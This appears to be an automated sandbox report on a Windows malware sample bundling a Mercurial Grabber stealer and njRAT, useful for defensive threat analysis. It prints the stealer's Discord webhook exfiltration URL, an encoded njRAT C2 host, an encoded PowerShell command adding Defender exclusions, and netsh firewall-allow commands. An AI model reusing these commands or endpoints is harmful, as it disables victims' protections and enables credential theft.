Analysis
-
max time kernel
154s -
max time network
193s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
03-10-2022 23:24
Static task
static1
Behavioral task
behavioral1
Sample
4e6984054c17293752f8d11ccac45e70.exe
Resource
win7-20220901-en
General
-
Target
4e6984054c17293752f8d11ccac45e70.exe
-
Size
159KB
-
MD5
4e6984054c17293752f8d11ccac45e70
-
SHA1
96b45cc928488f23eb485ebd72f1276996c7f785
-
SHA256
8d38d3866a011792617c9784fc9dc556f0c8c6aeeeb96aef679aea6ff6831028
-
SHA512
978e885d724fd91553483a077979f940a9349e45fce08b4a39c5cac25a5a75e0dd27b166b4724be19a435beef780ad8f866787035944285222385623af1ce9a5
-
SSDEEP
3072:C6x5F6chV9MBOefbGEKr2fewpgsRMCo1pn2A3PM+:CK6u9p3EKbwhRMCkp
Malware Config
Extracted
mercurialgrabber
https://discord.com/api/webhooks/1020039781461270569/vy0h8kS-gC86OffrPKkierhCOJQYdMCGfu4Dr7HRyL4VcCHEP6llcvNaOkPDg-SgwAnl
Extracted
njrat
0.7d
HacKed
Ni50Y3AuZXUubmdyb2suaW8Strik:MTM5OTI=
dcc8f8f212bdcee4931d8d1d2c481753
-
reg_key
dcc8f8f212bdcee4931d8d1d2c481753
-
splitter
|'|'|
Signatures
-
Mercurial Grabber Stealer
Mercurial Grabber is an open source stealer targeting Chrome, Discord and some game clients as well as generic system information.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\Oracle\VirtualBox Guest Additions output.exe -
Executes dropped EXE 2 IoCs
Processes:
output.exeWindows Defender.exepid process 4704 output.exe 5028 Windows Defender.exe -
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\SOFTWARE\VMWare, Inc.\VMWare Tools output.exe -
Modifies Windows Firewall 1 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid process 4408 netsh.exe 776 netsh.exe 332 netsh.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion output.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
4e6984054c17293752f8d11ccac45e70.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation 4e6984054c17293752f8d11ccac45e70.exe -
Drops startup file 2 IoCs
Processes:
Windows Defender.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Windows Defender.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Windows Defender.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 11 ip4.seeip.org 12 ip-api.com 10 ip4.seeip.org -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum output.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 output.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 4648 4704 WerFault.exe output.exe 3836 4704 WerFault.exe output.exe -
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S output.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
output.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString output.exe -
Delays execution with timeout.exe 5 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 3764 timeout.exe 3644 timeout.exe 3572 timeout.exe 3160 timeout.exe 4324 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
output.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer output.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName output.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4252 powershell.exe 4252 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Windows Defender.exepid process 5028 Windows Defender.exe -
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes:
output.exepowershell.exeWindows Defender.exedescription pid process Token: SeDebugPrivilege 4704 output.exe Token: SeDebugPrivilege 4252 powershell.exe Token: SeDebugPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe Token: 33 5028 Windows Defender.exe Token: SeIncBasePriorityPrivilege 5028 Windows Defender.exe -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
4e6984054c17293752f8d11ccac45e70.execmd.exeWindows Defender.exeoutput.exedescription pid process target process PID 4916 wrote to memory of 4252 4916 4e6984054c17293752f8d11ccac45e70.exe powershell.exe PID 4916 wrote to memory of 4252 4916 4e6984054c17293752f8d11ccac45e70.exe powershell.exe PID 4916 wrote to memory of 4252 4916 4e6984054c17293752f8d11ccac45e70.exe powershell.exe PID 4916 wrote to memory of 4704 4916 4e6984054c17293752f8d11ccac45e70.exe output.exe PID 4916 wrote to memory of 4704 4916 4e6984054c17293752f8d11ccac45e70.exe output.exe PID 4916 wrote to memory of 5028 4916 4e6984054c17293752f8d11ccac45e70.exe Windows Defender.exe PID 4916 wrote to memory of 5028 4916 4e6984054c17293752f8d11ccac45e70.exe Windows Defender.exe PID 4916 wrote to memory of 5028 4916 4e6984054c17293752f8d11ccac45e70.exe Windows Defender.exe PID 4916 wrote to memory of 1324 4916 4e6984054c17293752f8d11ccac45e70.exe cmd.exe PID 4916 wrote to memory of 1324 4916 4e6984054c17293752f8d11ccac45e70.exe cmd.exe PID 4916 wrote to memory of 1324 4916 4e6984054c17293752f8d11ccac45e70.exe cmd.exe PID 1324 wrote to memory of 4040 1324 cmd.exe chcp.com PID 1324 wrote to memory of 4040 1324 cmd.exe chcp.com PID 1324 wrote to memory of 4040 1324 cmd.exe chcp.com PID 1324 wrote to memory of 1064 1324 cmd.exe mode.com PID 1324 wrote to memory of 1064 1324 cmd.exe mode.com PID 1324 wrote to memory of 1064 1324 cmd.exe mode.com PID 1324 wrote to memory of 4324 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 4324 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 4324 1324 cmd.exe timeout.exe PID 5028 wrote to memory of 4408 5028 Windows Defender.exe netsh.exe PID 5028 wrote to memory of 4408 5028 Windows Defender.exe netsh.exe PID 5028 wrote to memory of 4408 5028 Windows Defender.exe netsh.exe PID 5028 wrote to memory of 776 5028 Windows Defender.exe netsh.exe PID 5028 wrote to memory of 776 5028 Windows Defender.exe netsh.exe PID 5028 wrote to memory of 776 5028 Windows Defender.exe netsh.exe PID 5028 wrote to memory of 332 5028 Windows Defender.exe netsh.exe PID 5028 wrote to memory of 332 5028 Windows Defender.exe netsh.exe PID 5028 wrote to memory of 332 5028 Windows Defender.exe netsh.exe PID 1324 wrote to memory of 3764 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 3764 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 3764 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 3644 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 3644 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 3644 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 3572 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 3572 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 3572 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 3160 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 3160 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 3160 1324 cmd.exe timeout.exe PID 1324 wrote to memory of 4224 1324 cmd.exe mode.com PID 1324 wrote to memory of 4224 1324 cmd.exe mode.com PID 1324 wrote to memory of 4224 1324 cmd.exe mode.com PID 4704 wrote to memory of 4648 4704 output.exe WerFault.exe PID 4704 wrote to memory of 4648 4704 output.exe WerFault.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe"C:\Users\Admin\AppData\Local\Temp\4e6984054c17293752f8d11ccac45e70.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAbAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAdQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAaQB6ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAbABjACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\output.exe"C:\Users\Admin\AppData\Local\Temp\output.exe"2⤵
- Looks for VirtualBox Guest Additions in registry
- Executes dropped EXE
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4704 -s 19363⤵
- Program crash
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4704 -s 19363⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh firewall delete allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe"3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\Windows Defender.exe" "Windows Defender.exe" ENABLE3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\scam_woofer.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\chcp.comchcp 650013⤵
-
C:\Windows\SysWOW64\mode.commode 80,153⤵
-
C:\Windows\SysWOW64\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mode.commode 130,303⤵
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 408 -p 4704 -ip 47041⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exeFilesize
93KB
MD50c6c4a3d96c78a24d6568b83e141896e
SHA1f5fb76840cb984722f61b370fb6641fa4ad9ac7e
SHA25673870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7
SHA5121700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be
-
C:\Users\Admin\AppData\Local\Temp\Windows Defender.exeFilesize
93KB
MD50c6c4a3d96c78a24d6568b83e141896e
SHA1f5fb76840cb984722f61b370fb6641fa4ad9ac7e
SHA25673870820b2784abba4cc69c26a57743e5a4e306727c7dc2d28e5753fa5fed2d7
SHA5121700a41014d50b79dd896fee0a705c700f3c534860b0ceefebc6413941520aedad7aa85f1f4c11d84c362b46de15e5ca7d9fa4a108fbaa9ca895107dee1d68be
-
C:\Users\Admin\AppData\Local\Temp\output.exeFilesize
41KB
MD55f34fc15a6555433e91d8dc0564d2092
SHA1dc786e4ddf9af8de8909da2489d2848dd39f762a
SHA256c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c
SHA512fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238
-
C:\Users\Admin\AppData\Local\Temp\output.exeFilesize
41KB
MD55f34fc15a6555433e91d8dc0564d2092
SHA1dc786e4ddf9af8de8909da2489d2848dd39f762a
SHA256c35218e577fe12ad1aa6835840f5b762893aeaa7759ea39aef6ef6b15a954e8c
SHA512fb90d8cfddd514cfc196149169c64578c11433ad27d0a0efc7394eae6b7a2f458d9184b84eec730e1a1ae1c5248a6749e6f21cdad42e1387e33ba1a23766b238
-
C:\Users\Admin\AppData\Local\Temp\scam_woofer.batFilesize
19KB
MD54b4e566a986fe97ba2d89f9c64a24c64
SHA118bba3d5058b4b53fc99f9fba94110f4e8f8c2ea
SHA2562950d0e125c3d1d11be27388ca83ef5d3fbcd71e49c0ed4eb0e0373340707a97
SHA51232e39cbd0ba54cd1bcf25158774a44060d65bdeef9de0986be5267c3da229d8e743afaa67b98492172b7b59cd3fb0cf9e0c5dc149651a3518479ac8af677cee8
-
memory/332-155-0x0000000000000000-mapping.dmp
-
memory/776-154-0x0000000000000000-mapping.dmp
-
memory/1064-145-0x0000000000000000-mapping.dmp
-
memory/1324-139-0x0000000000000000-mapping.dmp
-
memory/3160-169-0x0000000000000000-mapping.dmp
-
memory/3572-168-0x0000000000000000-mapping.dmp
-
memory/3644-164-0x0000000000000000-mapping.dmp
-
memory/3764-162-0x0000000000000000-mapping.dmp
-
memory/4040-143-0x0000000000000000-mapping.dmp
-
memory/4224-172-0x0000000000000000-mapping.dmp
-
memory/4252-142-0x00000000028E0000-0x0000000002916000-memory.dmpFilesize
216KB
-
memory/4252-160-0x00000000071B0000-0x00000000071CA000-memory.dmpFilesize
104KB
-
memory/4252-167-0x00000000074E0000-0x00000000074E8000-memory.dmpFilesize
32KB
-
memory/4252-166-0x0000000007500000-0x000000000751A000-memory.dmpFilesize
104KB
-
memory/4252-165-0x0000000007400000-0x000000000740E000-memory.dmpFilesize
56KB
-
memory/4252-132-0x0000000000000000-mapping.dmp
-
memory/4252-153-0x0000000005DA0000-0x0000000005DBE000-memory.dmpFilesize
120KB
-
memory/4252-147-0x0000000005710000-0x0000000005776000-memory.dmpFilesize
408KB
-
memory/4252-146-0x0000000005630000-0x0000000005652000-memory.dmpFilesize
136KB
-
memory/4252-156-0x0000000006480000-0x00000000064B2000-memory.dmpFilesize
200KB
-
memory/4252-158-0x0000000006440000-0x000000000645E000-memory.dmpFilesize
120KB
-
memory/4252-157-0x000000006EC10000-0x000000006EC5C000-memory.dmpFilesize
304KB
-
memory/4252-159-0x00000000077F0000-0x0000000007E6A000-memory.dmpFilesize
6.5MB
-
memory/4252-149-0x0000000005830000-0x0000000005896000-memory.dmpFilesize
408KB
-
memory/4252-161-0x0000000007220000-0x000000000722A000-memory.dmpFilesize
40KB
-
memory/4252-144-0x0000000005000000-0x0000000005628000-memory.dmpFilesize
6.2MB
-
memory/4252-163-0x0000000007440000-0x00000000074D6000-memory.dmpFilesize
600KB
-
memory/4324-151-0x0000000000000000-mapping.dmp
-
memory/4408-152-0x0000000000000000-mapping.dmp
-
memory/4648-173-0x0000000000000000-mapping.dmp
-
memory/4704-148-0x00007FFC65AF0000-0x00007FFC665B1000-memory.dmpFilesize
10.8MB
-
memory/4704-140-0x0000000000220000-0x0000000000230000-memory.dmpFilesize
64KB
-
memory/4704-170-0x00007FFC65AF0000-0x00007FFC665B1000-memory.dmpFilesize
10.8MB
-
memory/4704-133-0x0000000000000000-mapping.dmp
-
memory/4704-174-0x00007FFC65AF0000-0x00007FFC665B1000-memory.dmpFilesize
10.8MB
-
memory/5028-150-0x0000000072ED0000-0x0000000073481000-memory.dmpFilesize
5.7MB
-
memory/5028-135-0x0000000000000000-mapping.dmp
-
memory/5028-171-0x0000000072ED0000-0x0000000073481000-memory.dmpFilesize
5.7MB